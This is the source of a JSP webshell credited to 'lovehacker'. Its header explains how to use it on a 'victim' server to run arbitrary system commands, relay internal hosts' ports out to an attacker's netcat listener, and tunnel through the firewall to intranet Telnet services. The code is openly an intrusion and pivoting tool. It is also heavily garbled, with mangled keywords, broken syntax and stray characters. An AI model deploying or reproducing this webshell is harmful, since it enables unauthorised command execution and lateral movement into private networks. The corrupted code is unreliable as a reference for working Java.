<% / ** Webshell.jsp ** Author: lovehacker * e-mail: wangyun188@hotmail.com** Usage: *] http: //victim/webshell.jsp? [Options] * Options: * action = piped & remotehost = & remotePort = & myIp = & myPort = * action = tunnel & remoteHost = & remotePort = & myPort = * action = login & username = & password = & myPort = * action = send & myShell = & myPort = & cmd = * action = close & myPort = * action = shell & cmd = * examples: * action = Piped & transotehost = 192.168.0.1 & remotEport = 25 & myip = 218.0.0.1 & myport = 12345 - Connect 192.168.0.1 25 ports with 218.0.0.1 (you can use NC to listen to 12345 ports). Suitable for you unable to directly access a port of a machine in the internal network of the controlled web server, and the firewall does not filter outward connections to the web server. * action = tunnel & transotehost = 192.168.0.1 & remotEport = 23 & myport = 65534 - Implementation By accessing the webshell.jsp access the function of a host Telnet service in the intranet. (Originally wanted to implement any service access to the intranet by accessing WebShell.jsp, but the JSP function is limited, it is more complicated), which is suitable for the machine you control only 80 ports, and the firewall does not allow it to access the Internet, and You also want to access the Telnet service of the host in the net network: The correct username password for the Telnet host is only, or no one has no way. * action = send & myshell = & myport = & cmd = - The last step is done smoothly, then you can execute the command you want to perform on the top. MyShell This parameter is the end tag, otherwise you can't know how the data stream is over (must write to 喔, otherwise, you will be troublesome). CMD This parameter is the command you want to execute, such as "Which SSH", suggest you play: myshell = lovehacker & cmd = ls -la; echo lovehacker. * action = close & myport = - You are withdrawn Telnet login, but the program opened on the host is not closed, so you have to execute this command, and clean it on the spot. * anction = shell & cmd = - Execute the command on this machine you control.
Unix: / bin / sh -c tar vxf xxx.tar windows: c: /winnt/system32/cmd.exe / c: /winnt/win.ini* program description: * When you want to achieve Telnet agent through JSP Headache, each request is a new thread, Client Socket to connect * Telnet service can only batch commands, unable to interact with users, and then think about a stupid approach: Telnet's process is completed, pick * After receiving the tunnel command, first get two threads, one listener waiting to connect, a first and remote server build a good port connection and one * is constantly open, this Server Socket once again received data, forwarding To the remote server, you can record the status, real * now and the user's interaction, but always feel that this method is too stupid, if you use JSP to implement Telnet proxy function, you have a better way, please let me tell me. * Copyright Description: * It is also modified on the basis of Telnet, so you can also modify the code, so you can modify and copy anything. * Just add new features, don't forget Mail, give me a copy! *** /%> <% @ page import = "java.io. *"%> <% @ page import = "java.net. *"%> <% @ Page Import = "java.util. *"% > <% @ page import = "java.awt.Dimension"%> <% class redirector implements Runnable {private redirector companion = null; private Socket localSocket, remoteSocket; private InputStream from; private OutputStream to; private byte [] buffer = new byte [4096]; public redirector (Socket local, Socket remote) {try {localSocket = local; remoteSocket = remote; from = localSocket.getInputStream (); to = remoteSocket.getOutputStream ();} catch (Exception e) {}}
Public void couple (redirector c) {company = C; thread listen = new thread (this); listen.start ();}
Public void decouple () {company = null;}
Public void run () {int count; try {whele (component! = null) {IF ((count = from.read (buffer)) <0) Break; to.write (buffer, 0, count);}} catch (Exception E) {} try {from.close (); to.close (); localsocket.close (); Remotesocket.close (); if (component! = Null) Companion.Decouple ();} catch (Exception IO ) {}}}
class redirector1 implements Runnable {private redirector1 companion = null; private Socket localSocket, remoteSocket; private InputStream from; private OutputStream to; private byte [] buffer = new byte [4096]; public redirector1 (Socket local, Socket remote) {try {localSocket = local; remoteSocket = remote; from = localsocket.getinputStream (); to = remoteSocket.getOutputStream ();} catch (exception e) {}}}}
Public void couple (redirector1 c) {company = C; thread listen = new thread (this); listen.start ();}
Public void decouple () {company = null;}
Public void Run () {string tmp = ""; int count; try {while (component! = null) {IF (count = from.read (buffer)) <0) Break; TMP = New String (buffer); IF (Tmp.StartSwith)) {from.close (); to.close (); Remotesocket.close (); localsocket.close (); system.exit (1);} TO. Write (buffer, 0, count);}} catch (exception e) {} try {= null (} catcouple ();} catch (exception IO) {}}}}
Class Piped Implements Runnable {String Remotehost1, Remotehost2; Int RemotePort1, RemotePort2;
Thread Listener, Connection;
public piped (String raddr1, int rport1, String raddr2, int rport2) {remoteHost1 = raddr1; remotePort1 = rport1; remoteHost2 = raddr2; remotePort2 = rport2; listener = new Thread (this); listener.setPriority (Thread.MIN_PRIORITY); listener .start ();
public void run () {Socket destinationSocket1 = null; Socket destinationSocket2 = null; try {destinationSocket1 = new Socket (remoteHost1, remotePort1); destinationSocket2 = new Socket (remoteHost2, remotePort2); redirector r1 = new redirector (destinationSocket1, destinationSocket2); redirector r2 = new redirector (destinationSocket2, destinationSocket1); r1.couple (r2); r2.couple (r1);} catch (Exception e) {try {DataOutputStream os = new DataOutputStream (destinationSocket2.getOutputStream ()); os.writeChars ( "Remote Host Refuse Connection./N"); destinationSocket2.close ();} catch (ooException}) {}}}} Class Tunnel Implements Runnable {String Remotehost; Int Localport, Remoteport;
Thread Listener, Connection;
Serversocket Server;
Public Tunnel (int Lport, String Raddr, int Rport) {localport = Lport; RemoteHost = RADDR; Remoteport = Rport;
Try {server = new serversocket (localport);} catch (exception e) {}
Listener = New Thread (this); listener.SetPriority; listener.start ();}
public void run () {Socket destinationSocket = null; try {destinationSocket = new Socket (remoteHost, remotePort);} catch (Exception e) {} while (true) {Socket localSocket = null; try {localSocket = server.accept () ;} catch (Exception e) {continue;} try {redirector1 r1 = new redirector1 (localSocket, destinationSocket); redirector1 r2 = new redirector1 (destinationSocket, localSocket); r1.couple (r2); r2.couple (r1);} catch (Exception e) {try {DataOutputStream os = new DataOutputStream (localSocket.getOutputStream ()); os.writeChars ( "Remote host refused connection./n"); localSocket.close ();} catch (IOException ioe) {} CONTINUE;}}}}
Class telnetio {public string toString () {return "$ ID: Telnetio.java, V 1.10 1998/02/09 10:22:18 Leo EXP $";} private int debug = 0
Private Byte Neg_State = 0;
private final static byte STATE_DATA = 0; private final static byte STATE_IAC = 1; private final static byte STATE_IACSB = 2; private final static byte STATE_IACWILL = 3; private final static byte STATE_IACDO = 4; private final static byte STATE_IACWONT = 5; private final Static Byte State_iaacdont = 6; Private Final Static Byte State_iacSbiac = 7; Private Final Static Byte State_iacsbdata = 8; Private Final Static Byte State_iacsbdataiac = 9;
Private Byte Current_sb;
PRIVATE FINAL Static Byte IAC = (BYTE) 255;
PRIVATE FINAL STATIC BYTE EOR = (Byte) 239;
PRIVATE FINAL Static Byte Will = (BYTE) 251;
PRIVATE FINAL Static Byte Wont = (BYTE) 252;
PRIVATE FINAL Static Byte Do = (BYTE) 253;
PRIVATE FINAL Static Byte Dont = (BYTE) 254;
PRIVATE FINAL STATIC BYTE SB = (Byte) 250;
PRIVATE FINAL STATIC BYTE SE = (Byte) 240;
Private final static byte telopt_echo = (byte) 1; / * echo on / off * /
PRIVATE FINAL = (BYTE) 25; / * end of record * /
Private final static byte telopt_naws = (byte) 31; / * na-windowsize * /
Private final static byte telopt_ttype = (byte) 24; / * Terminal Type * /
Private final byte [] Iacwill = {IAC, Will}; private factory, wont = {IAC, wont}; private final byte [] iAcdo = {Iac, do}; private final byte [] IACDONT = {IAC, DONT }; private final byte [] IACSB = {IAC, SB}; private final byte [] IACSE = {IAC, SE};
PRIVATE FINAL BYTE TELQUAL_IS = (Byte) 0;
PRIVATE FINAL BYTE TELQUAL_SEND = (BYTE) 1;
Private byte [] receiveddx; private byte [] receivedwx;
Private byte [] SENTDX;
Private byte [] SentWX;
Private socket socket; private bufferedinputstream IS; private bufferedoutputstream OS;
// private statuspeer peer = this; / * peer, notified on status * /
Public void connection {if (debug> 0) System.out.println (" ") ")" ")"); Socket = new socket (address, port); is = new BufferedInputStream (socket.getInputStream ()); os = new BufferedOutputStream (socket.getOutputStream ()); neg_state = 0; receivedDX = new byte [256]; sentDX = new byte [256]; receivedWX = new Byte [256]; SENTWX = New Byte [256];
Public void disconnect () THROWS IOException {if (debug> 0) System.out.println ("telnetio.disconnect ()"); if (socket! = null) socket.close ();
Public void connect (string address) throws oews oException {connect (address, 23);}
// public void setpeer (statuspeer obj) {peer = Obj;}
Public int available () throws oException {return is.available ();
Public Byte [] Receive () throws ioException {int count = is.available (); byte buf [] = new byte [count]; count = is.read (buf); if (count <0) throw new oException (" "); If (debug> 1) System.out.println (" telnetio.Receive (): read bytes: " count); buf = negotiate (buf, count); return buf;}
Public void send (Byte [] BUF) THROWS IOEXCEPTION {IF (Debug> 1) System.out.println ("Telnetio.send (" BUF ")"); Os.Write (BUF); Os.Flush (); }
Public void send (BYTE B) THROWS IOException {IF (Debug> 1) System.out.println ("Telnetio.send (" B ")"); Os.Write (b); Os.flush ();} private Void handle_sb (Byte Type, Byte [] sbdata, int sbcount) throws ioException {if (debug> 1) System.out.println ("telnetio.handle_sb (" type ")"); switch (type) {copy telopt_ttype: IF (SBCount> 0 && SBData [0] == Telqual_send) {string TTYPE; Send (IACSB); Send (telQual_is); / * fixme: Need More Logic Here IF We Use * More Than Terminal Type * / Vector vec = new vector (2); vec.addelement ("ttype"); ttype = (string) NotifyStatus (vec); if (ttype == null) TTYPE = "dumb"; Byte [] bttype = new byte [TTYPE.LENGTH ()];
TTYPE.GETBYTES (0, TTYPE.LENGTH (), BTTYPE, 0); Send (BTTYPE); SEND (IACSE);
}
Public Object NotifyStatus (Vector Status) {if (Debug> 0) System.out.println ("Telnetio.notifyStatus (" Status ")"); Return Null;}
Private Byte [] Negotiate (byte buf [], int count) throws iodception {if (debug> 1) System.out.println ("Telnetio.negotiate (" BUF "," ")") "); byte nbuf [ ] = new byte [count]; Byte SBBUF [] = new byte [count]; byte sendbuf [] = new byte [3]; byte b, reply; int sbcount = 0; int boffset = 0, noffset = 0; Vector VEC = New Vector (2);
While (boffset IF (b> = 128) B = (byte) ((int) b-256); switch (neg_state) {copy state_data: if (b == Iac) {NEG_STATE = State_iac;} else {nbuf [Noffset ] = B } Break; Case State_iac: Switch (b) {Case IAC: IF (Debug> 2) System.out.Print ("IAC"); NBUF [Noffset ] = IAC; Break; Case Will: IF ( Debug> 2) System.out.Print ("Will"); NEG_STATE = State_iacwill; Break; Case Wont: IF (Debug> 2) System.out.print ("Wont"); NEG_STATE = State_iacWont; Break; Case DONT: IF (debug> 2) System.out.print ("dont"); neg_state = state_iacdont; break; case do: if (debug> 2) System.out.print ("do"); NEG_STATE = State_iaCDO; BREAK; CASE EOR: IF (Debug> 2) System.out.print ("EOR"); NEG_STATE = State_Data; Break; Case Sb: IF (Debug> 2) System.out.Print ("SB"); NEG_STATE = State_iacSb; SBCount = 0; brebue; default: IF (debug> 2) System.out.print (" Will;} Neg_State = State_Data; Break; Case State_iacwont: Switch (b) {Case Telopt_echo: IF (Debug> 2) System.out.println ("Echo"); Vec = new vector (2); vec.addelement ("localecho"); NotifyStatus (VEC); reply = dont; break; case telopt_eor: if (debug> 2) System.out.println ("EOR"); reply = DEFAULT: IF (Debug> 2) System.out.Println (" Sendbuf [2] = B; Send (sendbuf); SENTWX [B 128] = Reply; ReceiveDDX [B 128] = DO;} NEG_STATE = State_Data; Break; Case State_iaCDont: Switch (b) {CASE TELOPT_ECHO: IF ( Debug> 2) System.out.Println ("echo"); reply = wont; vec = new vector (2); vec.addelement ("nolocalecho"); NotifyStatus (vec); break; case telopt_naws: if (debug> 2) System.out.Println ("NAWS"); reply = Wont; break; default: if (debug> 2) System.out.println (" case SB: handle_sb (current_sb, sbbuf, sbcount); neg_state = STATE_IACSB; break; default: neg_state = STATE_DATA; break;} break; default: if (debug> 2) System.out.println ( "This should not happen:" neg_state ""); neg_state = sTATE_DATA; break;}} buf = new [noffset] byte; System.arraycopy (nbuf, 0, buf, 0, noffset); return buf;}} class TelnetConnect {TelnetIO tio = new TelnetIO (); int port = 0; public telnetConnect (int port) {this.port = port; Public void connect () {Try {TIO.CONNECT ("localhost", port);} catch (ioException e) {}} Public void disconnect () {TIO.Disconnect ();} catch (ooException e) {}} Private string Wait (string prompt) {string tmp = ""; do {TRY {TMP = new string (Tio.Receive (), 0);} catch (ooexception e) {}} while (Tmp.Indexof (prompt) == -1); returnit;} Private Byte [] received () {byte [] temp = null; try {temp = Tio.Receive ();} catch (→ → ooException e) {} Return Temp;} Private string waitshell () {string tmp = ""; do {TRY {TMP = new string (tio.Receive (), 0);} catch (ooException e) {}}} while ("$" ) == -1) && (tmp.indexof ("#") == -1) && (tmp.indexof ("%") == -1)); Return TMP;} Private void send (string str) {byte [] buf = new byte [str.Length ()]; str.getbytes (0, str.length (), buf, 0); try {tio.send (buf); Catch (IOEXCEPTION E) {}}}%> <% string action = Request.getParameter ("action"); string cmd = request.getParameter ("cmd"); string remotehost = request.getParameter ("remotehost"); String myIp = request.getParameter ( "myIp"); String myPort = request.getParameter ( "myPort"); String remotePort = request.getParameter ( "remotePort"); String username = request.getParameter ( "username"); String password = Request.getParameter ("password"); string myshell = request.getParameter ("myshell"); if (action.equals ("shell")) {try {process child = runtime.getRuntime (). EXEC (cmd); InputStream IN = child.getinputStream (); int C; while ((c = in.read ())! = -1) {out.print ((char) c);} in.close (); try {child.waitfor ();}}}}} catch (ooException e) {}} else f ("piped")) {Piped ME = New Piped (Remotehost, Integer.Parseint (Remoteport), Myip, Integer.Parseint (MyPort));} else IF (Action.equals ("tunnel")) {tunnel me = new tunnel (Integer.Parseint (MyPort), Remotehost, Integer.Parseint (RemotePort));} else IF (Action.equals ("Login")) {TelnetConnect TC = New TelnetConnect (Integer.Parseint (MyPort)); tc.connect (); out.print (tc.wait ("login:")); tc.send (username "/ r"); Out.print (TC. Wait ("Password:"); tc.send (Password "/ R"); out.print (tc.waitshell ()); tc.disconnect ();} else if (action.equals ("send")) {TelnetConnect TC = New TelnetConnect (Integer.Parseint (MyPort)); tc.connect (); tc.send (cmd "/ r");
